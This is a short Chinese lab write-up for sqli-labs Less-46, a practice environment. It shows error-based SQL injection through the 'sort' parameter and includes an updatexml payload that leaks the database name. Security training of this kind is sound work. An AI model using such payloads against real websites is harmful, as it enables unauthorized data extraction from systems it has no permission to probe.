sqli-labs-Less-46

SQLI-LAPS 实验记录

Less-46

这一关与之前的关卡不同,回到了get注入方式,但注入的参数不再是id,根据信息提示,以sort为参数进行注入。

首先我们在Password这一点输入Payload如下:

sql 复制代码
?sort=1

结果如图所示,页面以第一列为顺序,返回了数据库当中的数据。


之后,我们可以使用报错注入的方式,对数据库名、表名等内容进行注入。

php 复制代码
?sort=1 and updatexml(1,concat(0x7e,database(),0x7e),1)

结果如图所示,返回了数据库名。

相关推荐
troy1288 小时前
向量数据库选型指南:Milvus / Qdrant / Chroma / pgvector
数据库·milvus
彧azz8 小时前
Redis 全面指南:从核心概念到高可用架构实战
数据库·redis·架构
DBA小马哥9 小时前
MongoDB 数据同步怎么做?oplog、Change Streams、同步工具 4 种方案一次讲清(附踩坑清单)
数据库·mongodb
服务端相声演员10 小时前
in子查询的执行可能被优化为连接查询
mysql
huaqisafty10 小时前
网络赌博治安治理难点解析
网络安全·华企盾·社会治安治理·网赌赌博治理
香菜TTT11 小时前
Redis的哨兵机制
java·数据库·redis
风哥2号12 小时前
数据库教程FGMT13‑Oracle性能优化之数据仓库与分区表
数据库·oracle·性能优化
玉宇夕落12 小时前
Docker + Milvus,数据库永久存放记忆,让对话历史永不丢失
数据库·docker·llm
Zenova EdgeOS12 小时前
工业网关数据持久化:从同步到 WAL 的工程实战
网络·数据库·oracle